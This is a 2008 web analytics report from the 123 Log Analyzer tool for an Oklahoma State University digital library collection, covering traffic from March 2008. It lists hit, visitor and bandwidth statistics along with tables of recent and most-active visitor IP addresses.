123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:38 2008
Domain Name: digital.library.okstate.edu/oktoday Current Filter: My Filter

Time Period:01/Mar/2008:06:02:27 - 01/Apr/2008:04:55:54 total 32 day(s)
Download Excel CSV report       Open printable report
General Statistics

Statistics
Hits Total Hits 51621
Total Cached Hits 1358
Average Hits Per Day 1613
Average Hits Per Hour 69
Average Hits Per Visitor 8.8
Average Data Transferred per Hit 636.3 KB
Visitors Total Visitors 5876
Average Visitors Per Day 183
Average Time Spent 411 Seconds
Average PageViews per visitor 0.50
Average Downloads per visitor 6.92
Average Data Transferred per Visitor 5590.1 KB
Uniq IPs Total Uniq IPs 3499
Visitors Who Visit Once 2953
Visitors Who Visit more than Once 546
PageViews and Downloads Total PageViews 2917
Average PageViews Per Day 91
Total File Downloads 40656
Average File Downloads Per Day 1270
Total Images 6999
Average Images Per Day 218
Total failed requests 3
Total Incomplete File downloads requests 0
Number of visitors bookmarked your web site 0
Bandwidth Total Data Transferred 31.33 GB
Average Data Transferred per Day 1002.43 MB

Powered by 123LogAnalyzer

123 Log Analyzer report

123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:38 2008
Domain Name: digital.library.okstate.edu/oktoday

Time Period:01/Mar/2008:06:02:27 - 01/Apr/2008:04:55:54 total 32 day(s)
Hourly, Weekly,Daily Statistics

Daily Statistics
Date Hits Visitors Uniq IPs Data Transferred(KB)
Sat Mar 01 200868110483689281
Sun Mar 02 200818401531191644264
Mon Mar 03 200819952281781047582
Tue Mar 04 200820812021551057682
Wed Mar 05 20081791171133978756
Thu Mar 06 20081761188150816801
Fri Mar 07 200814301751411057732
Sat Mar 08 20081495170143877795
Sun Mar 09 200813952191911057919
Mon Mar 10 200828392291994841864
Tue Mar 11 200820332341941614155
Wed Mar 12 20081118156130501604
Thu Mar 13 20081466172136851349
Fri Mar 14 20081521171129841943
Sat Mar 15 20081521147119675197
Sun Mar 16 20081276175139481934
Mon Mar 17 20082168207158863186
Tue Mar 18 200815362662321023415
Wed Mar 19 20081519156120755868
Thu Mar 20 200827422011711031079
Fri Mar 21 20081554200170813563
Sat Mar 22 2008995161137640150
Sun Mar 23 20081349176149755607
Mon Mar 24 200816972101831037257
Tue Mar 25 200816221921581308219
Wed Mar 26 200813521801541079383
Thu Mar 27 20081579217184804011
Fri Mar 28 20081263156126658669
Sat Mar 29 20082104164132833331
Sun Mar 30 20081226205159974038
Mon Mar 31 20082052218181993880
Tue Apr 01 20086207360240105

Weekly Statistics
Day of week Hits Visitors Uniq IPs Data Transferred(KB)
Sunday70869286754913763
Monday1075110928188783771
Tuesday78929677125243578
Wednesday57806635083315612
Thursday75487786193503241
Friday57687025223371909
Saturday67967465703715756

Hourly Statistics
Hour of day Hits Visitors Uniq IPs Data Transferred(KB)
00:00-00:5936322782165602426
01:00-01:5926152702301494974
02:00-02:5924962592181214267
03:00-03:5923502472071179740
04:00-04:591833216176928872
05:00-05:591464198161730133
06:00-06:599841761321266673
07:00-07:59752159132544308
08:00-08:5958313697427045
09:00-09:59559133101504897
10:00-10:59787169117580359
11:00-11:5916311731421016800
12:00-12:59842143105881622
13:00-13:5916932151791137884
14:00-14:5924322852511398986
15:00-15:5927052602281238525
16:00-16:5928512982551711150
17:00-17:5932623342911530952
18:00-18:5929943182511748421
19:00-19:5935313843181819065
20:00-20:5936893763192021268
21:00-21:5931783322911471260
22:00-22:5929622712351209230
23:00-23:5917962462031188764

Daily Pageviews Statistics
Date Pageviews Total Visitor Stay Length Average Visitor Stay Length
Sat Mar 01 20085213 hours 33 mins 35 secs7 mins 49 secs
Sun Mar 02 2008811 days 0 hours 9 mins 5 secs9 mins 28 secs
Mon Mar 03 20081131 days 6 hours 23 mins 27 secs7 mins 59 secs
Tue Mar 04 200812223 hours 45 mins 20 secs7 mins 3 secs
Wed Mar 05 20089222 hours 8 mins 54 secs7 mins 46 secs
Thu Mar 06 20089123 hours 24 mins 57 secs7 mins 28 secs
Fri Mar 07 20088720 hours 25 mins 22 secs7 mins 0 secs
Sat Mar 08 200810619 hours 8 mins 22 secs6 mins 45 secs
Sun Mar 09 20087222 hours 40 mins 46 secs6 mins 12 secs
Mon Mar 10 20081081 days 5 hours 39 mins 44 secs7 mins 46 secs
Tue Mar 11 20089823 hours 8 mins 24 secs5 mins 56 secs
Wed Mar 12 20088419 hours 40 mins 41 secs7 mins 34 secs
Thu Mar 13 20088019 hours 40 mins 45 secs6 mins 51 secs
Fri Mar 14 2008971 days 0 hours 55 mins 45 secs8 mins 44 secs
Sat Mar 15 20087720 hours 13 mins 25 secs8 mins 15 secs
Sun Mar 16 20089120 hours 51 mins 8 secs7 mins 8 secs
Mon Mar 17 20081091 days 3 hours 31 mins 44 secs7 mins 58 secs
Tue Mar 18 200811820 hours 53 mins 0 secs4 mins 42 secs
Wed Mar 19 20081121 days 0 hours 34 mins 17 secs9 mins 27 secs
Thu Mar 20 20089619 hours 41 mins 20 secs5 mins 52 secs
Fri Mar 21 20089517 hours 21 mins 3 secs5 mins 12 secs
Sat Mar 22 20089618 hours 37 mins 18 secs6 mins 56 secs
Sun Mar 23 20087518 hours 32 mins 36 secs6 mins 19 secs
Mon Mar 24 20088520 hours 15 mins 0 secs5 mins 47 secs
Tue Mar 25 200810020 hours 44 mins 28 secs6 mins 28 secs
Wed Mar 26 20088620 hours 38 mins 42 secs6 mins 52 secs
Thu Mar 27 200811017 hours 21 mins 18 secs4 mins 47 secs
Fri Mar 28 20088218 hours 57 mins 13 secs7 mins 17 secs
Sat Mar 29 20088816 hours 59 mins 26 secs6 mins 12 secs
Sun Mar 30 20089622 hours 21 mins 3 secs6 mins 32 secs
Mon Mar 31 20089021 hours 16 mins 1 secs5 mins 51 secs
Tue Apr 01 2008288 hours 45 mins 6 secs7 mins 11 secs

Powered by 123LogAnalyzer

123 Log Analyzer report

123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:38 2008
Domain Name: digital.library.okstate.edu/oktoday

Time Period:01/Mar/2008:06:02:27 - 01/Apr/2008:04:55:54 total 32 day(s)
Visitor Information

Most Recent Visitors
Rank# IP address Domain name Country Time of Last Access Who owns this IP address
172.11.155.55DisabledUnited States of America01/Apr/2008:04:55:54Click Here
2208.111.154.15DisabledUnited States of America01/Apr/2008:04:55:46Click Here
374.6.19.177DisabledUnited States of America01/Apr/2008:04:45:33Click Here
4139.78.48.226DisabledUnited States of America01/Apr/2008:04:44:35Click Here
565.111.58.109DisabledUnited States of America01/Apr/2008:04:37:53Click Here
666.231.188.51DisabledUnited States of America01/Apr/2008:04:26:31Click Here
764.12.116.130DisabledUnited States of America01/Apr/2008:04:22:49Click Here
8139.78.48.226DisabledUnited States of America01/Apr/2008:04:14:27Click Here
9207.250.140.253DisabledUnited States of America01/Apr/2008:04:13:59Click Here
1072.30.179.222DisabledUnited States of America01/Apr/2008:04:08:54Click Here
11200.28.8.101DisabledChile01/Apr/2008:04:02:20Click Here
1266.249.66.198DisabledUnited States of America01/Apr/2008:03:56:28Click Here
1389.122.29.128DisabledUnited States of America01/Apr/2008:03:56:08Click Here
14208.111.154.16DisabledUnited States of America01/Apr/2008:03:54:35Click Here
1570.185.248.159DisabledUnited States of America01/Apr/2008:03:48:22Click Here
1668.12.99.101DisabledUnited States of America01/Apr/2008:03:45:11Click Here
17209.30.243.223DisabledUnited States of America01/Apr/2008:03:37:49Click Here
1871.163.182.68DisabledUnited States of America01/Apr/2008:03:34:50Click Here
19200.71.178.2DisabledUnited States of America01/Apr/2008:03:30:09Click Here
2074.196.124.176DisabledUnited States of America01/Apr/2008:03:28:40Click Here
2170.123.127.164DisabledUnited States of America01/Apr/2008:03:24:11Click Here
22208.111.154.16DisabledUnited States of America01/Apr/2008:03:20:15Click Here
2368.12.210.179DisabledUnited States of America01/Apr/2008:03:19:04Click Here
24139.78.48.226DisabledUnited States of America01/Apr/2008:03:14:26Click Here
25219.148.48.102DisabledUnited States of America01/Apr/2008:03:10:23Click Here
2666.63.177.130DisabledUnited States of America01/Apr/2008:03:03:20Click Here
27208.111.154.15DisabledUnited States of America01/Apr/2008:02:59:33Click Here
2865.55.104.155DisabledUnited States of America01/Apr/2008:02:56:55Click Here
2970.197.101.224DisabledUnited States of America01/Apr/2008:02:55:08Click Here
3068.57.134.82DisabledUnited States of America01/Apr/2008:02:48:21Click Here
3170.185.248.159DisabledUnited States of America01/Apr/2008:02:42:08Click Here
3266.157.54.174DisabledUnited States of America01/Apr/2008:02:35:50Click Here
3372.11.148.154DisabledUnited States of America01/Apr/2008:02:30:20Click Here
3475.106.121.201DisabledUnited States of America01/Apr/2008:02:22:45Click Here
3564.12.116.201DisabledUnited States of America01/Apr/2008:02:22:34Click Here
36129.44.74.227DisabledUnited States of America01/Apr/2008:02:21:14Click Here
3768.59.50.130DisabledUnited States of America01/Apr/2008:02:13:45Click Here
3824.8.45.82DisabledUnited States of America01/Apr/2008:02:08:53Click Here
3964.154.26.251DisabledUnited States of America01/Apr/2008:02:01:06Click Here
4068.97.124.137DisabledUnited States of America01/Apr/2008:01:58:08Click Here
41208.111.154.15DisabledUnited States of America01/Apr/2008:01:51:36Click Here
4274.6.7.182DisabledUnited States of America01/Apr/2008:01:49:12Click Here
43208.111.154.16DisabledUnited States of America01/Apr/2008:01:46:18Click Here
44205.188.116.16DisabledUnited States of America01/Apr/2008:01:35:25Click Here
4598.210.196.215DisabledUnited States of America01/Apr/2008:01:35:04Click Here
4672.220.233.12DisabledUnited States of America01/Apr/2008:01:25:03Click Here
4776.185.32.2DisabledUnited States of America01/Apr/2008:01:23:34Click Here
4891.109.20.71DisabledUnited States of America01/Apr/2008:01:22:59Click Here
4910.192.124.209DisabledLocal IP addresses01/Apr/2008:01:19:27Local IP address
5098.28.221.199DisabledUnited States of America01/Apr/2008:01:09:47Click Here
51208.111.154.15DisabledUnited States of America01/Apr/2008:01:07:57Click Here
52208.111.154.16DisabledUnited States of America01/Apr/2008:01:06:42Click Here
5366.63.177.150DisabledUnited States of America01/Apr/2008:00:59:07Click Here
5475.91.136.233DisabledUnited States of America01/Apr/2008:00:57:13Click Here
5568.92.112.230DisabledUnited States of America01/Apr/2008:00:56:34Click Here
5669.8.24.175DisabledUnited States of America01/Apr/2008:00:56:19Click Here
5766.251.24.107DisabledUnited States of America01/Apr/2008:00:54:27Click Here
5874.6.9.46DisabledUnited States of America01/Apr/2008:00:51:42Click Here
59205.188.116.204DisabledUnited States of America01/Apr/2008:00:45:30Click Here
6071.244.0.150DisabledUnited States of America01/Apr/2008:00:45:29Click Here
6170.242.115.242DisabledUnited States of America01/Apr/2008:00:44:44Click Here
6266.63.177.178DisabledUnited States of America01/Apr/2008:00:38:37Click Here
6375.162.21.66DisabledUnited States of America01/Apr/2008:00:36:01Click Here
64198.64.38.124DisabledUnited States of America01/Apr/2008:00:32:02Click Here
6565.31.209.7DisabledUnited States of America01/Apr/2008:00:31:00Click Here
6674.210.31.110DisabledUnited States of America01/Apr/2008:00:29:07Click Here
6770.185.245.242DisabledUnited States of America01/Apr/2008:00:24:11Click Here
68208.111.154.15DisabledUnited States of America01/Apr/2008:00:17:47Click Here
6965.255.86.129DisabledUnited States of America01/Apr/2008:00:15:53Click Here
70208.111.154.16DisabledUnited States of America01/Apr/2008:00:15:23Click Here
71139.78.48.226DisabledUnited States of America01/Apr/2008:00:14:31Click Here
7266.231.188.51DisabledUnited States of America01/Apr/2008:00:08:20Click Here
7369.8.20.66DisabledUnited States of America01/Apr/2008:00:05:35Click Here
74208.111.154.16DisabledUnited States of America31/Mar/2008:23:54:18Click Here
7572.64.95.110DisabledUnited States of America31/Mar/2008:23:45:48Click Here
76139.78.48.226DisabledUnited States of America31/Mar/2008:23:44:24Click Here
7724.253.249.57DisabledUnited States of America31/Mar/2008:23:43:24Click Here
7872.11.153.46DisabledUnited States of America31/Mar/2008:23:27:30Click Here
7975.162.21.66DisabledUnited States of America31/Mar/2008:22:59:16Click Here
8074.6.19.229DisabledUnited States of America31/Mar/2008:22:54:16Click Here
8172.11.147.18DisabledUnited States of America31/Mar/2008:22:47:35Click Here
8268.97.76.91DisabledUnited States of America31/Mar/2008:22:40:14Click Here
8367.195.51.163DisabledUnited States of America31/Mar/2008:22:09:00Click Here
8470.168.64.242DisabledUnited States of America31/Mar/2008:22:07:17Click Here
8568.229.193.8DisabledUnited States of America31/Mar/2008:21:51:37Click Here
8698.214.152.139DisabledUnited States of America31/Mar/2008:21:49:08Click Here
87139.78.48.226DisabledUnited States of America31/Mar/2008:21:44:29Click Here
88208.100.248.115DisabledUnited States of America31/Mar/2008:21:44:22Click Here
8924.116.7.110DisabledUnited States of America31/Mar/2008:21:36:19Click Here
9065.214.45.124DisabledUnited States of America31/Mar/2008:21:35:34Click Here
9168.97.117.213DisabledUnited States of America31/Mar/2008:21:30:54Click Here
9224.141.161.135DisabledCanada31/Mar/2008:21:30:02Click Here
93205.143.139.200DisabledUnited States of America31/Mar/2008:21:26:42Click Here
94139.78.48.226DisabledUnited States of America31/Mar/2008:21:14:23Click Here
95209.60.191.210DisabledUnited States of America31/Mar/2008:21:14:22Click Here
9665.55.232.11DisabledUnited States of America31/Mar/2008:21:07:39Click Here
97164.58.177.38DisabledUnited States of America31/Mar/2008:21:06:13Click Here
9824.124.68.149DisabledUnited States of America31/Mar/2008:20:58:36Click Here
99204.94.232.3DisabledUnited States of America31/Mar/2008:20:49:43Click Here
10074.6.27.108DisabledUnited States of America31/Mar/2008:20:44:38Click Here
101139.78.48.226DisabledUnited States of America31/Mar/2008:20:44:22Click Here
10298.211.1.239DisabledUnited States of America31/Mar/2008:20:36:16Click Here
10374.61.239.113DisabledUnited States of America31/Mar/2008:20:33:32Click Here
104156.110.99.121DisabledUnited States of America31/Mar/2008:20:31:14Click Here
10570.135.14.15DisabledUnited States of America31/Mar/2008:20:30:40Click Here
10665.68.118.2DisabledUnited States of America31/Mar/2008:20:26:05Click Here
107204.87.70.146DisabledUnited States of America31/Mar/2008:20:21:08Click Here
108207.255.155.240DisabledUnited States of America31/Mar/2008:19:43:06Click Here
10969.94.175.196DisabledUnited States of America31/Mar/2008:19:40:35Click Here
11066.231.188.51DisabledUnited States of America31/Mar/2008:19:39:03Click Here
11170.110.48.170DisabledUnited States of America31/Mar/2008:19:36:32Click Here
112164.58.0.170DisabledUnited States of America31/Mar/2008:19:35:06Click Here
113192.138.49.36DisabledUnited States of America31/Mar/2008:19:15:49Click Here
114139.78.48.226DisabledUnited States of America31/Mar/2008:19:14:29Click Here
115164.58.72.3DisabledUnited States of America31/Mar/2008:19:14:27Click Here
11672.11.148.50DisabledUnited States of America31/Mar/2008:19:12:13Click Here
117204.94.232.3DisabledUnited States of America31/Mar/2008:19:08:45Click Here
11864.207.253.238DisabledUnited States of America31/Mar/2008:19:08:20Click Here
11966.142.195.205DisabledUnited States of America31/Mar/2008:19:07:31Click Here
12072.11.153.58DisabledUnited States of America31/Mar/2008:19:07:23Click Here
12165.68.118.2DisabledUnited States of America31/Mar/2008:19:02:21Click Here
12266.48.65.212DisabledUnited States of America31/Mar/2008:18:55:00Click Here
12376.115.152.117DisabledUnited States of America31/Mar/2008:18:50:53Click Here
12466.141.69.49DisabledUnited States of America31/Mar/2008:18:36:52Click Here
12564.12.116.14DisabledUnited States of America31/Mar/2008:18:32:06Click Here
12624.248.250.170DisabledUnited States of America31/Mar/2008:18:27:38Click Here
12767.195.58.188DisabledUnited States of America31/Mar/2008:18:27:03Click Here
12872.11.153.94DisabledUnited States of America31/Mar/2008:18:15:50Click Here
12974.6.28.36DisabledUnited States of America31/Mar/2008:18:15:19Click Here
13070.123.104.87DisabledUnited States of America31/Mar/2008:18:03:09Click Here
13172.11.155.174DisabledUnited States of America31/Mar/2008:17:56:14Click Here
13266.218.144.49DisabledUnited States of America31/Mar/2008:17:51:39Click Here
13372.11.151.212DisabledUnited States of America31/Mar/2008:17:49:20Click Here
13468.12.225.171DisabledUnited States of America31/Mar/2008:17:42:45Click Here
13568.58.125.134DisabledUnited States of America31/Mar/2008:17:39:09Click Here
13665.71.181.129DisabledUnited States of America31/Mar/2008:17:32:50Click Here
13766.188.71.135DisabledUnited States of America31/Mar/2008:17:16:12Click Here
138139.78.48.226DisabledUnited States of America31/Mar/2008:17:14:21Click Here
139139.78.143.20DisabledUnited States of America31/Mar/2008:17:14:16Click Here
140207.200.116.9DisabledUnited States of America31/Mar/2008:17:04:30Click Here
14169.66.42.67DisabledUnited States of America31/Mar/2008:17:01:25Click Here
14268.15.115.153DisabledUnited States of America31/Mar/2008:17:00:49Click Here
143208.35.49.138DisabledUnited States of America31/Mar/2008:17:00:22Click Here
14474.6.20.29DisabledUnited States of America31/Mar/2008:16:59:52Click Here
145129.15.228.72DisabledUnited States of America31/Mar/2008:16:54:59Click Here
14674.6.27.119DisabledUnited States of America31/Mar/2008:16:52:39Click Here
14765.61.118.31DisabledUnited States of America31/Mar/2008:16:51:33Click Here
14874.195.204.33DisabledUnited States of America31/Mar/2008:16:45:50Click Here
14965.19.59.200DisabledUnited States of America31/Mar/2008:16:43:58Click Here
150164.58.145.60DisabledUnited States of America31/Mar/2008:16:38:21Click Here
15170.168.64.242DisabledUnited States of America31/Mar/2008:16:36:47Click Here
15271.29.240.153DisabledUnited States of America31/Mar/2008:16:35:01Click Here
15374.6.29.179DisabledUnited States of America31/Mar/2008:16:29:10Click Here
154204.61.10.197DisabledUnited States of America31/Mar/2008:16:20:55Click Here
155139.78.48.226DisabledUnited States of America31/Mar/2008:15:44:20Click Here
15663.111.163.13DisabledUnited States of America31/Mar/2008:15:40:48Click Here
15774.6.19.176DisabledUnited States of America31/Mar/2008:15:40:01Click Here
158129.244.43.74DisabledUnited States of America31/Mar/2008:15:39:46Click Here
15965.162.255.11DisabledUnited States of America31/Mar/2008:15:38:44Click Here
160205.188.116.65DisabledUnited States of America31/Mar/2008:15:34:21Click Here
161129.15.194.15DisabledUnited States of America31/Mar/2008:15:29:39Click Here
16270.245.172.6DisabledUnited States of America31/Mar/2008:15:28:29Click Here
163139.78.35.217DisabledUnited States of America31/Mar/2008:15:20:57Click Here
16475.81.158.11DisabledUnited States of America31/Mar/2008:15:17:57Click Here
165164.119.14.40DisabledUnited States of America31/Mar/2008:15:10:54Click Here
16664.207.225.146DisabledUnited States of America31/Mar/2008:15:06:09Click Here
16770.129.209.177DisabledUnited States of America31/Mar/2008:15:02:29Click Here
168139.78.48.226DisabledUnited States of America31/Mar/2008:14:44:19Click Here
16924.119.108.108DisabledUnited States of America31/Mar/2008:14:40:28Click Here
17066.231.188.51DisabledUnited States of America31/Mar/2008:14:39:00Click Here
17174.60.150.246DisabledUnited States of America31/Mar/2008:14:20:11Click Here
17271.125.32.190DisabledUnited States of America31/Mar/2008:14:18:16Click Here
17398.20.188.86DisabledUnited States of America31/Mar/2008:14:10:44Click Here
174156.110.35.122DisabledUnited States of America31/Mar/2008:14:07:45Click Here
17568.99.115.5DisabledUnited States of America31/Mar/2008:14:05:27Click Here
17666.63.177.187DisabledUnited States of America31/Mar/2008:14:03:08Click Here
17769.130.102.90DisabledUnited States of America31/Mar/2008:13:53:13Click Here
178209.81.119.164DisabledUnited States of America31/Mar/2008:13:47:55Click Here
17974.6.28.113DisabledUnited States of America31/Mar/2008:13:47:21Click Here
180208.145.195.194DisabledUnited States of America31/Mar/2008:13:42:51Click Here
18167.195.58.156DisabledUnited States of America31/Mar/2008:13:41:51Click Here
18274.6.25.105DisabledUnited States of America31/Mar/2008:13:37:38Click Here
183208.111.154.15DisabledUnited States of America31/Mar/2008:13:34:47Click Here
18472.11.155.209DisabledUnited States of America31/Mar/2008:13:21:35Click Here
18572.11.153.45DisabledUnited States of America31/Mar/2008:13:21:23Click Here
18674.6.19.62DisabledUnited States of America31/Mar/2008:13:19:58Click Here
18764.12.116.203DisabledUnited States of America31/Mar/2008:13:19:48Click Here
18866.142.195.205DisabledUnited States of America31/Mar/2008:13:18:41Click Here
189208.111.154.16DisabledUnited States of America31/Mar/2008:13:12:21Click Here
19065.55.208.48DisabledUnited States of America31/Mar/2008:12:44:41Click Here
19189.122.29.79DisabledUnited States of America31/Mar/2008:12:39:28Click Here
19266.231.188.51DisabledUnited States of America31/Mar/2008:12:28:50Click Here
193139.78.48.226DisabledUnited States of America31/Mar/2008:12:14:18Click Here
194208.111.154.16DisabledUnited States of America31/Mar/2008:12:13:11Click Here
195212.175.115.102DisabledTurkey31/Mar/2008:11:59:06Click Here
196212.175.115.100DisabledTurkey31/Mar/2008:11:58:57Click Here
197212.175.115.77DisabledTurkey31/Mar/2008:11:58:01Click Here
19874.6.27.59DisabledUnited States of America31/Mar/2008:11:57:36Click Here
199125.163.76.111DisabledUnited States of America31/Mar/2008:11:38:43Click Here
200208.111.154.15DisabledUnited States of America31/Mar/2008:11:28:29Click Here
20174.6.28.230DisabledUnited States of America31/Mar/2008:11:16:39Click Here
202122.164.39.128DisabledUnited States of America31/Mar/2008:11:14:10Click Here
203208.111.154.16DisabledUnited States of America31/Mar/2008:11:03:37Click Here
20468.14.162.146DisabledUnited States of America31/Mar/2008:11:03:23Click Here
20567.195.58.176DisabledUnited States of America31/Mar/2008:11:00:32Click Here
206212.50.174.181DisabledUnited Kingdom31/Mar/2008:10:55:11Click Here
207208.111.154.15DisabledUnited States of America31/Mar/2008:10:47:47Click Here
20866.231.188.51DisabledUnited States of America31/Mar/2008:10:37:34Click Here
209139.78.48.226DisabledUnited States of America31/Mar/2008:10:14:18Click Here
210139.78.48.226DisabledUnited States of America31/Mar/2008:09:44:16Click Here
211208.111.154.16DisabledUnited States of America31/Mar/2008:09:39:24Click Here
212208.111.154.15DisabledUnited States of America31/Mar/2008:09:25:19Click Here
21359.96.157.42DisabledUnited States of America31/Mar/2008:09:07:56Click Here
21459.95.233.49DisabledUnited States of America31/Mar/2008:09:05:43Click Here
21574.6.23.28DisabledUnited States of America31/Mar/2008:09:05:03Click Here
216208.111.154.15DisabledUnited States of America31/Mar/2008:08:38:05Click Here
217139.78.48.226DisabledUnited States of America31/Mar/2008:08:14:16Click Here
21874.6.8.32DisabledUnited States of America31/Mar/2008:08:04:45Click Here
21974.6.9.173DisabledUnited States of America31/Mar/2008:07:52:57Click Here
22065.29.98.138DisabledUnited States of America31/Mar/2008:07:47:17Click Here
221116.30.103.81DisabledUnited States of America31/Mar/2008:07:46:56Click Here
22272.171.0.142DisabledUnited States of America31/Mar/2008:07:43:27Click Here
223198.11.7.66DisabledUnited States of America31/Mar/2008:07:32:38Click Here
224139.78.48.226DisabledUnited States of America31/Mar/2008:07:14:18Click Here
22582.146.171.140DisabledUnited States of America31/Mar/2008:07:08:26Click Here
22672.11.155.218DisabledUnited States of America31/Mar/2008:07:07:06Click Here
22774.6.8.24DisabledUnited States of America31/Mar/2008:06:59:55Click Here
228195.229.236.245DisabledUnited States of America31/Mar/2008:06:58:30Click Here
22967.195.58.152DisabledUnited States of America31/Mar/2008:06:51:41Click Here
230139.78.48.226DisabledUnited States of America31/Mar/2008:06:44:15Click Here
23167.195.58.188DisabledUnited States of America31/Mar/2008:06:41:49Click Here
232198.207.222.14DisabledUnited States of America31/Mar/2008:06:34:01Click Here
23391.98.8.116DisabledUnited States of America31/Mar/2008:06:27:06Click Here
23474.6.19.235DisabledUnited States of America31/Mar/2008:06:23:10Click Here
23574.6.21.186DisabledUnited States of America31/Mar/2008:06:14:27Click Here
23674.6.31.230DisabledUnited States of America31/Mar/2008:06:13:06Click Here
23774.6.23.58DisabledUnited States of America31/Mar/2008:06:07:58Click Here
23876.121.175.133DisabledUnited States of America31/Mar/2008:05:56:59Click Here
23966.231.188.51DisabledUnited States of America31/Mar/2008:05:53:35Click Here
24076.94.101.255DisabledUnited States of America31/Mar/2008:05:45:45Click Here
24164.194.16.127DisabledUnited States of America31/Mar/2008:05:34:46Click Here
24274.6.8.49DisabledUnited States of America31/Mar/2008:05:26:41Click Here
243139.78.48.226DisabledUnited States of America31/Mar/2008:05:14:14Click Here
24467.83.122.181DisabledUnited States of America31/Mar/2008:05:06:06Click Here
24572.11.151.21DisabledUnited States of America31/Mar/2008:04:54:34Click Here
24658.69.121.213DisabledUnited States of America31/Mar/2008:04:39:59Click Here
24768.229.204.131DisabledUnited States of America31/Mar/2008:04:39:18Click Here
24874.6.19.61DisabledUnited States of America31/Mar/2008:04:35:32Click Here
24974.6.21.227DisabledUnited States of America31/Mar/2008:04:29:40Click Here
25074.6.7.154DisabledUnited States of America31/Mar/2008:04:20:04Click Here
251139.78.48.226DisabledUnited States of America31/Mar/2008:04:14:13Click Here
25224.6.136.3DisabledUnited States of America31/Mar/2008:04:08:34Click Here
25367.232.196.55DisabledUnited States of America31/Mar/2008:04:06:04Click Here
25471.209.87.173DisabledUnited States of America31/Mar/2008:03:51:27Click Here
25598.213.183.241DisabledUnited States of America31/Mar/2008:03:45:24Click Here

Visitors who had the most hits on the web site
Rank# IP address Domain name Country Total Hits Who owns this IP address
1139.78.48.226DisabledUnited States of America3246Click Here
2204.87.108.215DisabledUnited States of America788Click Here
375.25.65.6DisabledUnited States of America782Click Here
466.249.65.212DisabledUnited States of America681Click Here
588.131.106.12DisabledUnited States of America589Click Here
671.144.68.72DisabledUnited States of America384Click Here
767.54.160.114DisabledUnited States of America371Click Here
875.162.21.66DisabledUnited States of America338Click Here
966.249.65.193DisabledUnited States of America320Click Here
10129.15.228.72DisabledUnited States of America287Click Here
1174.195.252.10DisabledUnited States of America284Click Here
1268.109.249.131DisabledUnited States of America282Click Here
1367.202.9.66DisabledUnited States of America274Click Here
14164.58.79.195DisabledUnited States of America266Click Here
1565.64.69.121DisabledUnited States of America262Click Here
16216.56.8.250DisabledUnited States of America258Click Here
17192.136.130.17DisabledUnited States of America255Click Here
1868.97.76.91DisabledUnited States of America237Click Here
1976.171.2.175DisabledUnited States of America222Click Here
2071.75.241.1DisabledUnited States of America212Click Here
2168.12.77.75DisabledUnited States of America206Click Here
22204.62.26.61DisabledUnited States of America205Click Here
23209.144.2.3DisabledUnited States of America205Click Here
24137.240.136.82DisabledUnited States of America198Click Here
25198.207.222.132DisabledUnited States of America196Click Here
2624.178.205.89DisabledUnited States of America192Click Here
2765.68.118.2DisabledUnited States of America180Click Here
2875.48.20.252DisabledUnited States of America164Click Here
2975.91.220.125DisabledUnited States of America164Click Here
30204.87.106.131DisabledUnited States of America158Click Here
31216.51.176.177DisabledUnited States of America158Click Here
3212.157.34.133DisabledUnited States of America150Click Here
3374.195.235.183DisabledUnited States of America141Click Here
34205.209.254.10DisabledUnited States of America138Click Here
3512.157.34.134DisabledUnited States of America134Click Here
3671.244.0.150DisabledUnited States of America134Click Here
3765.255.91.21DisabledUnited States of America131Click Here
3870.168.64.242DisabledUnited States of America131Click Here
3972.198.55.69DisabledUnited States of America131Click Here
40155.219.241.10DisabledUnited States of America129Click Here
4163.241.203.245DisabledUnited States of America128Click Here
4264.149.35.254DisabledUnited States of America128Click Here
43204.62.18.227DisabledUnited States of America118Click Here
4470.177.111.142DisabledUnited States of America117Click Here
4564.235.249.114DisabledUnited States of America110Click Here
4691.124.141.33DisabledUnited States of America110Click Here
4770.137.11.118DisabledUnited States of America108Click Here
4864.207.241.58DisabledUnited States of America103Click Here
49164.58.0.170DisabledUnited States of America98Click Here
5070.233.152.104DisabledUnited States of America96Click Here
514.138.16.92DisabledUnited States of America95Click Here
5267.61.128.122DisabledUnited States of America94Click Here
5375.91.226.239DisabledUnited States of America94Click Here
54156.110.98.78DisabledUnited States of America93Click Here
5570.185.224.39DisabledUnited States of America90Click Here
5668.97.63.109DisabledUnited States of America87Click Here
5774.195.238.52DisabledUnited States of America83Click Here
5876.213.146.145DisabledUnited States of America82Click Here
5998.160.122.103DisabledUnited States of America82Click Here
6098.197.0.121DisabledUnited States of America82Click Here
61204.87.86.50DisabledUnited States of America81Click Here
6268.73.206.25DisabledUnited States of America80Click Here
63209.55.85.36DisabledUnited States of America80Click Here
6464.19.111.133DisabledUnited States of America78Click Here
6571.30.155.74DisabledUnited States of America78Click Here
66193.61.19.190DisabledUnited Kingdom78Click Here
6767.142.130.45DisabledUnited States of America77Click Here
6874.195.182.78DisabledUnited States of America77Click Here
6976.193.80.46DisabledUnited States of America77Click Here
7086.149.79.134DisabledUnited States of America74Click Here
71158.111.4.27DisabledUnited States of America74Click Here
7272.192.101.122DisabledUnited States of America73Click Here
7312.215.133.65DisabledUnited States of America71Click Here
7474.224.50.106DisabledUnited States of America71Click Here
7565.255.86.129DisabledUnited States of America70Click Here
7670.178.4.222DisabledUnited States of America70Click Here
7776.198.248.142DisabledUnited States of America70Click Here
7870.247.155.253DisabledUnited States of America69Click Here
7971.223.120.189DisabledUnited States of America69Click Here
8076.115.152.117DisabledUnited States of America69Click Here
8196.231.214.24DisabledUnited States of America69Click Here
8298.20.251.0DisabledUnited States of America69Click Here
83164.58.72.20DisabledUnited States of America69Click Here
8472.147.134.147DisabledUnited States of America68Click Here
8574.195.184.150DisabledUnited States of America68Click Here
86204.249.208.105DisabledUnited States of America68Click Here
8767.162.182.93DisabledUnited States of America67Click Here
8868.89.202.170DisabledUnited States of America67Click Here
89198.253.49.6DisabledUnited States of America66Click Here
9072.198.18.166DisabledUnited States of America65Click Here
9176.123.83.48DisabledUnited States of America65Click Here
9266.249.66.198DisabledUnited States of America63Click Here
93192.173.47.153DisabledUnited States of America63Click Here
94198.211.215.114DisabledUnited States of America63Click Here
9524.60.170.103DisabledUnited States of America62Click Here
9671.119.168.159DisabledUnited States of America62Click Here
9772.64.95.110DisabledUnited States of America62Click Here
9898.160.103.237DisabledUnited States of America62Click Here
9968.13.225.165DisabledUnited States of America61Click Here
10068.89.251.174DisabledUnited States of America61Click Here
10175.61.14.177DisabledUnited States of America61Click Here
